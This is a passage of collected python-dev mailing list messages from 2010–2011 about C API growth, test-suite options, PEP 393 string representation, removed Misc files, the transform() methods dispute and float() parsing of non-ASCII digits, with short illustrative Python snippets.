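encoded = "é".encode("latin-1")  # one byte per character in this encoding
print(names, encoded)
```

If every spelling is known to the registry as an alias of the same codec, `names` holds a single entry, which is the practical sense in which the aliases are interchangeable inside Python.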
Re: [Python-Dev] API bloat
Mark Shannon wrote:
Nick Coghlan wrote: On Thu, Feb 10, 2011 at 8:16 PM, Mark Shannon ma...@dcs.gla.ac.uk wrote:
Doing a search for the regex: PyAPI_FUNC\([^)]*\) *Py in .h files, which should match API functions (functions starting _Py are excluded) gives the following result:
Version  matches
3.0      717
3.1.3    728
3.2b2    743
It would appear the API bloat is real, not just an artefact of updated docs.
Since it doesn't account for #ifdef, a naive count like that isn't a valid basis for comparison.
OK. How about this:
egrep -ho '#.*PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h
finds no matches.
egrep -ho 'PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h | sort -u
This finds all matches and removes duplicates, so anything defined multiple times in branches of #ifdef blocks will only be counted once.
Version  matches
3.0      714
3.1.3    725
3.2b2    739
Given these numbers, I don't think the subject line really captures the problem accurately enough ... a 2% increase in the number of API functions per release can hardly be called API bloat :-)
So, given the revised numbers: the what's new for 3.2 API section: http://docs.python.org/dev/py3k/whatsnew/3.2.html#build-and-c-api-changes lists 6 new functions, yet 14 have been added between 3.1.3 and 3.2b2.
Could you identify the ones that are not yet documented ? That would be useful.
Thanks,
-- Marc-Andre Lemburg eGenix.com (#1, Feb 10 2011)
Re: [Python-Dev] API bloat
Mark Shannon wrote:
M.-A. Lemburg wrote: Mark Shannon wrote: Nick Coghlan wrote: On Thu, Feb 10, 2011 at 8:16 PM, Mark Shannon ma...@dcs.gla.ac.uk wrote:
Doing a search for the regex: PyAPI_FUNC\([^)]*\) *Py in .h files, which should match API functions (functions starting _Py are excluded) gives the following result:
Version  matches
3.0      717
3.1.3    728
3.2b2    743
It would appear the API bloat is real, not just an artefact of updated docs.
Since it doesn't account for #ifdef, a naive count like that isn't a valid basis for comparison.
OK. How about this:
egrep -ho '#.*PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h
finds no matches.
egrep -ho 'PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h | sort -u
This finds all matches and removes duplicates, so anything defined multiple times in branches of #ifdef blocks will only be counted once.
Version  matches
3.0      714
3.1.3    725
3.2b2    739
Given these numbers, I don't think the subject line really captures the problem accurately enough ... a 2% increase in the number of API functions per release can hardly be called API bloat :-)
So, given the revised numbers: the what's new for 3.2 API section: http://docs.python.org/dev/py3k/whatsnew/3.2.html#build-and-c-api-changes lists 6 new functions, yet 14 have been added between 3.1.3 and 3.2b2.
Could you identify the ones that are not yet documented ? That would be useful.
Here are the details:
The following API functions were removed from 3.1.3:
  PyAST_Compile
  PyCObject_AsVoidPtr
  PyCObject_FromVoidPtr
  PyCObject_FromVoidPtrAndDesc
  PyCObject_GetDesc
  PyCObject_Import
  PyCObject_SetVoidPtr
  PyCode_CheckLineNumber
  Py_CompileStringFlags
  PyEval_CallObject
  PyOS_ascii_atof
  PyOS_ascii_formatd
  PyOS_ascii_strtod
  PyThread_exit_prog
  PyThread__PyThread_exit_prog
  PyThread__PyThread_exit_thread
  PyUnicode_SetDefaultEncoding
And the following were added to 3.2, of which only 2 are documented:
  PyArg_ValidateKeywordArguments
  PyAST_CompileEx
  Py_CompileString
  Py_CompileStringExFlags
  PyErr_NewExceptionWithDoc (documented)
  PyErr_SyntaxLocationEx
  PyErr_WarnFormat
  PyFrame_GetLineNumber
  PyImport_ExecCodeModuleWithPathnames
  PyImport_GetMagicTag
  PyLong_AsLongLongAndOverflow (documented)
  PyModule_GetFilenameObject
  Py_SetPath
  PyStructSequence_GetItem
  PyStructSequence_NewType
  PyStructSequence_SetItem
  PySys_AddWarnOptionUnicode
  PySys_AddXOption
  PySys_FormatStderr
  PySys_FormatStdout
  PySys_GetXOptions
  PyThread_acquire_lock_timed
  PyType_FromSpec
  PyUnicode_AsUnicodeCopy
  PyUnicode_AsWideCharString
  PyUnicode_EncodeFSDefault
  PyUnicode_FSDecoder
  Py_UNICODE_strcat
  Py_UNICODE_strncmp
  Py_UNICODE_strrchr
  PyUnicode_TransformDecimalToASCII
For added confusion PySys_SetArgvEx is documented as new in 3.2, but exists in 3.1.3.
That should keep someone busy ;)
Note that this only includes functions. The API also includes a number of macros such as Py_False and Py_RETURN_FALSE, types, and data like PyBool_Type. I've not tried to analyse any of these.
Thanks. I opened http://bugs.python.org/issue11173 for this.
-- Marc-Andre Lemburg eGenix.com (#1, Feb 10 2011)
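The comparison described in this thread (collect the unique PyAPI_FUNC names per release, then diff the sets) can be sketched in a few lines of Python. This is only an approximation of the egrep pipeline, not the script Mark used; the two header snippets and their `(void)` signatures are invented for illustration, and only the function names come from the lists above.

```python
import re

# Same idea as the egrep pattern in the thread: a PyAPI_FUNC(...) declaration
# followed by a name starting with "Py" (names starting with "_Py" do not match).
API_DECL = re.compile(r"PyAPI_FUNC\([^)]*\)\s*(Py\w+)")

def public_api_names(header_text):
    """Return the set of public function names; duplicates collapse like `sort -u`."""
    return set(API_DECL.findall(header_text))

def diff_api(old_header, new_header):
    """Return (removed, added) name lists between two header texts."""
    old, new = public_api_names(old_header), public_api_names(new_header)
    return sorted(old - new), sorted(new - old)

# Hypothetical header excerpts; the signatures are placeholders, not the real ones.
OLD_HEADER = """
PyAPI_FUNC(double) PyOS_ascii_atof(void);
PyAPI_FUNC(void) PySys_SetArgvEx(void);
PyAPI_FUNC(void) _Py_PrivateHelper(void);
"""
NEW_HEADER = """
#ifdef SOME_FLAG
PyAPI_FUNC(void) PySys_SetArgvEx(void);
#else
PyAPI_FUNC(void) PySys_SetArgvEx(void);
#endif
PyAPI_FUNC(void) Py_SetPath(void);
"""

removed, added = diff_api(OLD_HEADER, NEW_HEADER)
print("removed:", removed)
print("added:", added)
```

Using sets means a function declared once per `#ifdef` branch is counted once, which is the point Nick raised about the naive count.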
Re: [Python-Dev] API bloat
Mark Shannon wrote:
The Unicode Exception Objects section is new and seemingly redundant: http://docs.python.org/py3k/c-api/exceptions.html#unicode-exception-objects Should this be in the public API?
Those functions have been in the public API since we introduced Unicode callback error handlers. It was an oversight that these were not documented in the Python documentation. They have been documented as part of unicodeobject.h ever since they were introduced.
Note that these APIs are needed by codecs supporting the callback error handlers, and since performance matters a lot for codecs, the C APIs were introduced.
-- Marc-Andre Lemburg eGenix.com (#1, Feb 09 2011)
Re: [Python-Dev] Python Unit Tests
Wesley Mesquita wrote:
Hi all, I am starting to explore the Python 3k core development environment. So, sorry in advance for any mistakes, but I really don't know what the best list to post this on is, since it is not a use-of-Python issue, and probably is not a dev issue; it is more like a dev env question. I have run the test suite and got the messages below.
~/python_dev/python$ make testall
./python -Wd -E -bb ./Lib/test/regrtest.py -uall -l
== CPython 3.2rc2+ (py3k:88376, Feb 7 2011, 18:31:28) [GCC 4.4.5]
== Linux-2.6.35-24-generic-x86_64-with-debian-squeeze-sid little-endian
== /home/wesley/python_dev/python/build/test_python_3387
Testing with flags: sys.flags(debug=0, division_warning=0, inspect=0, interactive=0, optimize=0, dont_write_bytecode=0, no_user_site=0, no_site=0, ignore_environment=1, verbose=0, bytes_warning=2, quiet=0)
[...]
[198/349] test_ossaudiodev
test_ossaudiodev skipped -- [Errno 2] No such file or directory: '/dev/dsp'
[...]
[200/349] test_parser
Expecting 's_push: parser stack overflow' in next line
s_push: parser stack overflow
[...]
[321/349] test_urllib2net /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=8, family=2, type=2049, proto=6 self._sock = None /home/wesley/python_dev/python/Lib/urllib/request.py:2134: ResourceWarning: unclosed socket.socket object, fd=7, family=2, type=2049, proto=6 sys.exc_info()[2]) /home/wesley/python_dev/python/Lib/urllib/request.py:2134: ResourceWarning: unclosed socket.socket object, fd=8, family=2, type=2049, proto=6 sys.exc_info()[2]) /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=8, family=2, type=1, proto=6 self._sock = None /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=9, family=2, type=1, proto=6 self._sock = None /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=9, family=2, type=2049, proto=6 self._sock = None /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=7, family=2, type=2049, proto=6 self._sock = None [323/349] test_urllibnet /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=7, family=2, type=1, proto=6 self._sock = None 24 tests skipped: test_bz2 test_curses test_dbm_gnu test_dbm_ndbm test_gdb test_kqueue test_ossaudiodev test_readline test_smtpnet test_socketserver test_sqlite test_ssl test_startfile test_tcl test_timeout test_tk test_ttk_guionly test_ttk_textonly test_urllib2net test_urllibnet test_winreg test_winsound test_xmlrpc_net test_zipfile64 9 skips unexpected on linux2: test_bz2 test_dbm_gnu test_dbm_ndbm test_readline test_ssl test_tcl test_tk test_ttk_guionly test_ttk_textonly sys:1: ResourceWarning: unclosed file _io.TextIOWrapper name='/dev/null' mode='a' encoding='UTF-8' But running each of them individually: :~/python_dev/python$ ./python Lib/test/regrtest.py test_ossaudiodev [1/1] test_ossaudiodev test_ossaudiodev 
skipped -- Use of the `audio' resource not enabled
1 test skipped: test_ossaudiodev
Those skips are all expected on linux2.
./python Lib/test/regrtest.py test_parser
[1/1] test_parser
Expecting 's_push: parser stack overflow' in next line
s_push: parser stack overflow
1 test OK.
./python Lib/test/regrtest.py test_urllib2net
[1/1] test_urllib2net
test_urllib2net skipped -- Use of the `network' resource not enabled
1 test skipped: test_urllib2net
Those skips are all expected on linux2.
Is there any reason for the different results?
Yes: you are not using the same options on the stand-alone tests as you are on the suite run. Most importantly, you are not enabling all resources (-uall).
-- Marc-Andre Lemburg eGenix.com (#1, Feb 08 2011)
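The effect described in the answer (the same test either runs or is skipped depending on which resources were enabled) can be modelled with plain `unittest`. This is a simplified stand-in, not regrtest's actual mechanism: the `enabled` set plays the role of the `-u` option, and the test class is hypothetical.

```python
import unittest

def count_skips(enabled):
    """Run one resource-gated test and return how many tests were skipped.

    `enabled` is a hypothetical stand-in for the resources passed via -u.
    """
    class NetworkTest(unittest.TestCase):
        @unittest.skipUnless("network" in enabled,
                             "Use of the 'network' resource not enabled")
        def test_fetch(self):
            # A real test would open a network connection here.
            self.assertTrue(True)

    suite = unittest.defaultTestLoader.loadTestsFromTestCase(NetworkTest)
    result = unittest.TestResult()
    suite.run(result)
    return len(result.skipped)

skipped_without = count_skips(set())          # like a run without -u
skipped_with = count_skips({"network"})       # like a run with -uall or -unetwork
print(skipped_without, skipped_with)
```

Running the individual tests with the same `-uall` flag as the `make testall` invocation should therefore give results comparable to the full suite run.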
Re: [Python-Dev] PEP 393: Flexible String Representation
I'll comment more on this later this week...
From my first impression, I'm not too thrilled by the prospect of making the Unicode implementation more complicated by having three different representations on each object.
I also don't see how this could save a lot of memory. As an example, take a French text with, say, 10 million code points. This would end up appearing in memory as 3 copies on Windows: one copy stored as UCS2 (20MB), one as Latin-1 (10MB) and one as UTF-8 (probably around 15MB, depending on how many accents are used). That's a saving of -10MB compared to today's implementation :-)
Martin v. Löwis wrote:
I have been thinking about Unicode representation for some time now. This was triggered, on the one hand, by discussions with Glyph Lefkowitz (who complained that his server app consumes too much memory), and Carl Friedrich Bolz (who profiled Python applications to determine that Unicode strings are among the top consumers of memory in Python). On the other hand, this was triggered by the discussion on supporting surrogates in the library better.
I'd like to propose PEP 393, which takes a different approach, addressing both problems simultaneously: by getting a flexible representation (one that can be either 1, 2, or 4 bytes), we can support the full range of Unicode on all systems, but still use only one byte per character for strings that are pure ASCII (which will be the majority of strings for the majority of users).
You'll find the PEP at http://www.python.org/dev/peps/pep-0393/ For convenience, I include it below.
-- Marc-Andre Lemburg eGenix.com (#1, Jan 25 2011)
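The size estimates in the first paragraph can be checked on a small scale by encoding a sample string three ways. The sketch below only measures encoded byte counts; it says nothing about which of these buffers PEP 393 would actually keep alive at the same time, and the sample sentence is my own.

```python
def storage_sizes(text):
    """Return the byte counts of `text` in the three encodings mentioned above."""
    return {
        "ucs2": len(text.encode("utf-16-le")),   # 2 bytes per BMP code point
        "latin1": len(text.encode("latin-1")),   # 1 byte per code point
        "utf8": len(text.encode("utf-8")),       # 1 byte, 2 for accented letters
    }

sample = "Le café près de l'hôtel était fermé."
sizes = storage_sizes(sample)
print(len(sample), sizes)
```

For ordinary French prose the UTF-8 size stays much closer to the Latin-1 size than to the UCS2 size, because only the accented letters need a second byte.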
Re: [Python-Dev] [Python-checkins] r88127 - in python/branches/py3k/Misc: README.AIX README.OpenBSD cheatsheet
brett.cannon wrote:
Author: brett.cannon Date: Thu Jan 20 20:34:35 2011 New Revision: 88127 Log: Remove some outdated files from Misc.
Removed: python/branches/py3k/Misc/README.AIX
Are you sure that the AIX README is outdated ? It explains some of the details of why there are scripts like ld_so_aix which are still needed on AIX.
python/branches/py3k/Misc/README.OpenBSD
Same here. Does OpenBSD 4.x still have the issues mentioned in the file ?
python/branches/py3k/Misc/cheatsheet
Wouldn't it be better to update this useful file (as part of your PSF grant) ? Most of it still applies to Py3.
Regarding some other things you removed or moved:
DSVN-Python3/Misc/maintainers.rst DSVN-Python3/Misc/developers.txt
Why were these removed from the source archive ? They are useful to have around for users wanting to report bugs and are useful to follow the development of the core team between different Python versions.
DSVN-Python3/Misc/python-mode.el
Why is this gone ? It's a useful file for Emacs users and usually more recent than what you get with your Emacs installation.
DSVN-Python3/Misc/AIX-NOTES
I guess this was renamed to README.AIX before you removed it. See above.
DSVN-Python3/Misc/PURIFY.README
Why is this outdated ? Should probably be renamed to README.Purify.
DSVN-Python3/Misc/RFD
That's a piece of Python history. These nuggets should stay in the Python source archive, IMHO.
DSVN-Python3/Misc/setuid-prog.c
This is useful for people writing setuid programs in Python and avoids many of the usual pitfalls: http://mail.python.org/pipermail/python-list/1999-April/620658.html
-- Marc-Andre Lemburg eGenix.com (#1, Jan 20 2011)
Re: [Python-Dev] Tools/unicode
Michael Foord wrote:
On 03/01/2011 15:39, Alexander Belopolsky wrote:
On Mon, Jan 3, 2011 at 10:33 AM, Michael Foord mich...@voidspace.org.uk wrote: ..
If someone knows if this tool is still used/useful then please let us know how the description should best be updated. If there are no replies I'll remove it.
If you are talking about Tools/unicode/, this is definitely a very useful tool used to generate unicodedata and encoding modules from raw unicode.org files.
The description currently reads "Tools used to generate unicode database files". I'll update it to read: "tool used to generate unicodedata and encoding modules from raw unicode.org files"
Make that "Tools for generating unicodedata and codecs from unicode.org and other mapping files". The scripts in that dir are not just one tool, but several tools needed to maintain the Unicode database in Python as well as generate new codecs from mapping files.
-- Marc-Andre Lemburg eGenix.com (#1, Jan 03 2011)
Re: [Python-Dev] The fate of transform() and untransform() methods
Alexander Belopolsky wrote:
On Fri, Dec 3, 2010 at 1:05 PM, Guido van Rossum gu...@python.org wrote:
On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com wrote: ..
I believe MAL's thought was that the addition of these methods had been approved pre-moratorium, but I don't know if that is a sufficient argument or not.
It is not. The moratorium is intended to freeze the state of the language as implemented, not whatever was discussed and approved but didn't get implemented (that'd be a hole big enough to drive a truck through, as the saying goes :-). Regardless of what I or others may have said before, I am not currently a fan of adding transform() to either str or bytes.
I would like to restart the discussion under a separate subject because the original thread [1] went off the specific topic of the six new methods (2 methods x 3 types) added to builtins shortly before 3.2 beta was released. [2] The ticket that introduced the change is currently closed [3] even though the last message suggests that at least part of the change needs to be reverted.
That's for Guido to decide.
The moratorium, if at all, would only cover the new methods, not the other changes (re-adding the codecs and fixing the codecs.py module to work with bytes as well as Unicode), all of which were already discussed at length in several previous discussions, on tickets and on python-dev.
I don't see much point in going through the same discussions over and over again. Fortunately, I'm on vacation next week, so I don't have to go through all this again ;-)
Cheers,
-- Marc-Andre Lemburg eGenix.com (#1, Dec 09 2010)
Re: [Python-Dev] The fate of transform() and untransform() methods
Michael Foord wrote:
On 09/12/2010 15:03, M.-A. Lemburg wrote: Alexander Belopolsky wrote:
On Fri, Dec 3, 2010 at 1:05 PM, Guido van Rossum gu...@python.org wrote:
On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com wrote: ..
I believe MAL's thought was that the addition of these methods had been approved pre-moratorium, but I don't know if that is a sufficient argument or not.
It is not. The moratorium is intended to freeze the state of the language as implemented, not whatever was discussed and approved but didn't get implemented (that'd be a hole big enough to drive a truck through, as the saying goes :-). Regardless of what I or others may have said before, I am not currently a fan of adding transform() to either str or bytes.
I would like to restart the discussion under a separate subject because the original thread [1] went off the specific topic of the six new methods (2 methods x 3 types) added to builtins shortly before 3.2 beta was released. [2] The ticket that introduced the change is currently closed [3] even though the last message suggests that at least part of the change needs to be reverted.
That's for Guido to decide.
Well, Guido *already* said no to transform / untransform in the previous thread.
I'm not sure he did and asked for clarification (see attached email).
-- Marc-Andre Lemburg eGenix.com (#1, Dec 09 2010)
---BeginMessage---
Guido van Rossum wrote:
On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com wrote:
On Fri, 03 Dec 2010 11:14:56 -0500, Alexander Belopolsky alexander.belopol...@gmail.com wrote:
On Fri, Dec 3, 2010 at 10:11 AM, R. David Murray rdmur...@bitdance.com wrote: ..
Please also recall that transform/untransform was discussed before the release of Python 3.0 and was approved at the time, but it just did not get implemented before the 3.0 release.
Can you provide a link? My search for transform on python-dev came out with
It was linked from the issue, if I recall correctly. I do remember reading the thread from the python-3000 list, linked by someone somewhere :)
http://mail.python.org/pipermail/python-dev/2010-June/100564.html where you seem to oppose these methods. Also, new methods to builtins
It looks to me like I was agreeing that transform/untransform should do only bytes-bytes or str-str regardless of what codec name you passed them.
fall under the language moratorium (but can be approved on a case-by-case basis): http://www.python.org/dev/peps/pep-3003/#case-by-case-exemptions Is there an effort to document these exceptions? I expected such approvals to be added to PEP 3003, but apparently this was not the case.
I believe MAL's thought was that the addition of these methods had been approved pre-moratorium,
Indeed.
but I don't know if that is a sufficient argument or not.
It is not. The moratorium is intended to freeze the state of the language as implemented, not whatever was discussed and approved but didn't get implemented (that'd be a hole big enough to drive a truck through, as the saying goes :-).
Sure, but those two particular methods only provide interfaces to the codecs sub-system without actually requiring any major implementation changes. Furthermore, they help ease adoption of Python 3.x (quoted from PEP 3003), since the functionality they add back was removed from Python 3.0 in a way that makes it difficult to port Python2 applications to Python3.
Regardless of what I or others may have said before, I am not currently a fan of adding transform() to either str or bytes.
How should I read this ? Do you want the methods to be removed again and added back in 3.3 ?
Frankly, I'm a bit tired of constantly having to argue against cutting down the Unicode and codec support in Python3.
-- Marc-Andre Lemburg eGenix.com (#1, Dec 06 2010)
Re: [Python-Dev] The fate of transform() and untransform() methods
Alexander Belopolsky wrote:
On Thu, Dec 9, 2010 at 10:03 AM, M.-A. Lemburg m...@egenix.com wrote:
Alexander Belopolsky wrote: .. The ticket that introduced the change is currently closed [3] even though the last message suggests that at least part of the change needs to be reverted.
That's for Guido to decide.
The decision will probably rest with the release manager, but Guido has clearly voiced his opinion.
FYI: Georg explicitly asked me whether I would have the patch ready for 3.2 and since I didn't have time to work on it, he volunteered to implement it, which I'd like to thank him for !
-- Marc-Andre Lemburg eGenix.com (#1, Dec 09 2010)
Re: [Python-Dev] transform() and untransform() methods, and the codec registry
Guido van Rossum wrote:
On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com wrote:
On Fri, 03 Dec 2010 11:14:56 -0500, Alexander Belopolsky alexander.belopol...@gmail.com wrote:
On Fri, Dec 3, 2010 at 10:11 AM, R. David Murray rdmur...@bitdance.com wrote: ..
Please also recall that transform/untransform was discussed before the release of Python 3.0 and was approved at the time, but it just did not get implemented before the 3.0 release.
Can you provide a link? My search for transform on python-dev came out with
It was linked from the issue, if I recall correctly. I do remember reading the thread from the python-3000 list, linked by someone somewhere :)
http://mail.python.org/pipermail/python-dev/2010-June/100564.html where you seem to oppose these methods. Also, new methods to builtins
It looks to me like I was agreeing that transform/untransform should do only bytes-bytes or str-str regardless of what codec name you passed them.
fall under the language moratorium (but can be approved on a case-by-case basis): http://www.python.org/dev/peps/pep-3003/#case-by-case-exemptions Is there an effort to document these exceptions? I expected such approvals to be added to PEP 3003, but apparently this was not the case.
I believe MAL's thought was that the addition of these methods had been approved pre-moratorium,
Indeed.
but I don't know if that is a sufficient argument or not.
It is not. The moratorium is intended to freeze the state of the language as implemented, not whatever was discussed and approved but didn't get implemented (that'd be a hole big enough to drive a truck through, as the saying goes :-).
Sure, but those two particular methods only provide interfaces to the codecs sub-system without actually requiring any major implementation changes. Furthermore, they help ease adoption of Python 3.x (quoted from PEP 3003), since the functionality they add back was removed from Python 3.0 in a way that makes it difficult to port Python2 applications to Python3.
Regardless of what I or others may have said before, I am not currently a fan of adding transform() to either str or bytes.
How should I read this ? Do you want the methods to be removed again and added back in 3.3 ?
Frankly, I'm a bit tired of constantly having to argue against cutting down the Unicode and codec support in Python3.
-- Marc-Andre Lemburg eGenix.com (#1, Dec 06 2010)
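For readers who have not used the functionality under discussion: the same-type codecs (bytes to bytes, str to str) are reachable through the `codecs` module functions regardless of whether `transform()`/`untransform()` methods exist. The sketch below shows that route only; the helper names are mine, and the codec names used are the module-style spellings `base64_codec` and `rot_13`.

```python
import codecs

def to_base64(data):
    """bytes -> bytes, using the base64 codec via the codecs module."""
    return codecs.encode(data, "base64_codec")

def from_base64(data):
    """bytes -> bytes, reversing to_base64()."""
    return codecs.decode(data, "base64_codec")

def rot13(text):
    """str -> str; ROT13 is its own inverse."""
    return codecs.encode(text, "rot_13")

payload = b"hello world"
round_trip = from_base64(to_base64(payload))
scrambled = rot13("hello world")
print(round_trip, scrambled)
```

The proposed methods would have been thin wrappers around calls like these, which is the sense of "only provide interfaces to the codecs sub-system" in the message.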
Re: [Python-Dev] Python and the Unicode Character Database
Alexander Belopolsky wrote: On Thu, Dec 2, 2010 at 5:58 PM, M.-A. Lemburg m...@egenix.com wrote: .. I will change my mind on this issue when you present a machine-readable file with Arabic-Indic numerals and a program capable of reading it and show that this program uses the same number parsing algorithm as Python's int() or float(). Have you had a look at the examples I posted ? They include texts and tables with numbers written using east asian arabic numerals. Yes, but this was all about output. I am pretty sure TeX was able to typeset Qur'an in all its glory long before Unicode was invented. Yet, in machine readable form it would be something like {\quran 1} (invented directive). I have asked for a file that is intended for machine processing, not for human enjoyment in print or on a display. I claim that if such file exists, the program that reads it does not use the same rules as Python and converting non-ascii digits would be a tiny portion of what that program does. Well, programs that take input from the keyboards I posted in this thread will have to deal with the digits. Since Python's input() accepts keyboard input, you have your use case :-) Seriously, I find the distinction between input and output forms of numerals somewhat misguided. Any output can also serve as input. For books and other printed material, images, etc. you have scanners and OCR. For screen output you have screen readers. For spreadsheets and data, you have CSV, TSV, XML, etc. etc. etc. Just for the fun of it, I created a CSV file with Thai and Dzongkha numerals (in addition to Arabic ones) using OpenOffice. 
Here's the cut and paste version:

Numbers in various scripts

Arabic  Thai  Dzongkha
1       ๑     ༡
2       ๒     ༢
3       ๓     ༣
4       ๔     ༤
5       ๕     ༥
6       ๖     ༦
7       ๗     ༧
8       ๘     ༨
9       ๙     ༩
10      ๑๐    ༡༠
11      ๑๑    ༡༡
12      ๑๒    ༡༢
13      ๑๓    ༡༣
14      ๑๔    ༡༤
15      ๑๕    ༡༥
16      ๑๖    ༡༦
17      ๑๗    ༡༧
18      ๑๘    ༡༨
19      ๑๙    ༡༩
20      ๒๐    ༢༠

And here's the script that goes with it:

    import csv
    c = csv.reader(open('Numbers-in-various-scripts.csv'))
    # Skip the three header rows.
    headers = [c.next() for i in range(3)]
    # Iterate over the reader so the loop ends cleanly at end of file.
    for row in c:
        print [int(unicode(x, 'utf-8')) for x in row]

and the output using Python 2.7:

    [1, 1, 1]
    [2, 2, 2]
    [3, 3, 3]
    [4, 4, 4]
    [5, 5, 5]
    [6, 6, 6]
    [7, 7, 7]
    [8, 8, 8]
    [9, 9, 9]
    [10, 10, 10]
    [11, 11, 11]
    [12, 12, 12]
    [13, 13, 13]
    [14, 14, 14]
    [15, 15, 15]
    [16, 16, 16]
    [17, 17, 17]
    [18, 18, 18]
    [19, 19, 19]
    [20, 20, 20]

If you need more such files, I can generate as many as you like ;-) I can send the OOo file as well, if you like to play around with it. I'd say: case closed :-)

-- Marc-Andre Lemburg eGenix.com (#1, Dec 03 2010)

Attachment (Numbers-in-various-scripts.csv):

    Numbers in various scripts,,
    ,,
    Arabic,Thai,Dzongkha
    1,๑,༡
    2,๒,༢
    3,๓,༣
    4,๔,༤
    5,๕,༥
    6,๖,༦
    7,๗,༧
    8,๘,༨
    9,๙,༩
    10,๑๐,༡༠
    11,๑๑,༡༡
    12,๑๒,༡༢
    13,๑๓,༡༣
    14,๑๔,༡༤
    15,๑๕,༡༥
    16,๑๖,༡༦
    17,๑๗,༡༧
    18,๑๘,༡༨
    19,๑๙,༡༩
    20,๒๐,༢༠
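For readers on Python 3, the same experiment can be sketched roughly as follows. This is an illustration, not the script from the message: the CSV content is held in an in-memory string (`CSV_TEXT`) instead of the attached file, only three data rows are included, and `parse_rows` is a hypothetical helper name.

```python
import csv
import io

# In-memory stand-in for the attached CSV file (assumed layout: three
# header rows, then Arabic, Thai and Dzongkha columns).
CSV_TEXT = (
    "Numbers in various scripts,,\n"
    ",,\n"
    "Arabic,Thai,Dzongkha\n"
    "1,๑,༡\n"
    "10,๑๐,༡༠\n"
    "20,๒๐,༢༠\n"
)


def parse_rows(text, header_rows=3):
    """Return each data row as a list of ints, skipping the header rows."""
    reader = csv.reader(io.StringIO(text))
    for _ in range(header_rows):
        next(reader)
    # int() accepts any Unicode decimal digit, so no per-script code is needed.
    return [[int(cell) for cell in row] for row in reader]


rows = parse_rows(CSV_TEXT)
print(rows)
```

In Python 3 the strings are already Unicode, so the explicit `unicode(x, 'utf-8')` step from the Python 2.7 script is not needed.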
Re: [Python-Dev] Python and the Unicode Character Database
Martin v. Löwis wrote: Now, one may wonder what precisely a possibly signed floating point number is, but most likely, this refers to floatnumber ::= pointfloat | exponentfloat pointfloat::= [intpart] fraction | intpart . exponentfloat ::= (intpart | pointfloat) exponent intpart ::= digit+ fraction ::= . digit+ exponent ::= (e | E) [+ | -] digit+ digit ::= 0...9 I don't see why the language spec should limit the wealth of number formats supported by float(). If it doesn't, there should be some other specification of what is correct and what is not. It must not be unspecified. True. It is not uncommon for Asians and other non-Latin script users to use their own native script symbols for numbers. Just because these digits may look strange to someone doesn't mean that they are meaningless or should be discarded. Then these users should speak up and indicate their need, or somebody should speak up and confirm that there are users who actually want '١٢٣٤.٥٦' to denote 1234.56. To my knowledge, there is no writing system in which '١٢٣٤.٥٦e4' means 12345600.0. I'm not sure what you're after here. Please also remember that Python3 now allows Unicode names for identifiers for much the same reasons. No no no. Addition of Unicode identifiers has a well-designed, deliberate specification, with a PEP and all. The support for non-ASCII digits in float appears to be ad-hoc, and not founded on actual needs of actual users. Please note that we didn't have PEPs and the PEP process at the time. The Unicode proposal predates and in some respects inspired the PEP process. The decision to add this support was deliberate based on the desire to support as much of the nice features of Unicode in Python as we could. At least that was what was driving me at the time. Regarding actual needs of actual users: I don't buy that as an argument when it comes to supporting a standard that is meant to attract users with non-ASCII origins. 
Some references you may want to read up on:

http://en.wikipedia.org/wiki/Numbers_in_Chinese_culture
http://en.wikipedia.org/wiki/Vietnamese_numerals
http://en.wikipedia.org/wiki/Korean_numerals
http://en.wikipedia.org/wiki/Japanese_numerals

Even MS Office supports them: http://languages.siuc.edu/Chinese/Language_Settings.html

Note that the support in float() (and the other numeric constructors) to work with Unicode code points was explicitly added when Unicode support was added to Python and has been available since Python 1.6.

That doesn't necessarily make it useful. Alexander's complaint is that it makes Python unstable (i.e. changing as the UCD changes).

If that were true, then all Unicode database (UCD) changes would make Python unstable. However, most changes to existing code points in the UCS are bug fixes, so they actually have a stabilizing quality more than a destabilizing one.

It is not a bug by any definition of bug

Most certainly it is: the documentation is either underspecified, or deviates from the implementation (when taking the most plausible interpretation). This is the very definition of bug.

The implementation is not a bug and neither was this a bug in the 2.x series of the Python documentation. The Python 3.x docs apparently introduced a reference to the language spec which is clearly not capturing the wealth of possible inputs. So, yes, we're talking about a documentation bug, but not an implementation bug.

-- Marc-Andre Lemburg eGenix.com (#1, Nov 29 2010)
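The behaviour under discussion in this message can be checked with a short Python 3 sketch. It assumes CPython 3, where, as far as I can tell, float() accepts any decimal digit of category Nd but still expects the ASCII '.' and 'e'. The digits are written as escapes to avoid bidirectional-text surprises when copying; the variable names are only illustrative.

```python
# ARABIC-INDIC DIGITS ONE..SIX, spelling "1234.56" with an ASCII dot.
arabic_indic = "\u0661\u0662\u0663\u0664.\u0665\u0666"

value = float(arabic_indic)
scaled = float(arabic_indic + "e4")  # ASCII exponent marker

print(value)
print(scaled)

# The Arabic decimal separator U+066B is not a digit and is rejected.
try:
    float("\u0661\u0662\u0663\u0664\u066b\u0665\u0666")
    separator_accepted = True
except ValueError:
    separator_accepted = False

print(separator_accepted)
```

The last check illustrates the objection raised in the thread: the digits are script-aware, while the separator and exponent notation are not.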
Re: [Python-Dev] Python and the Unicode Character Database
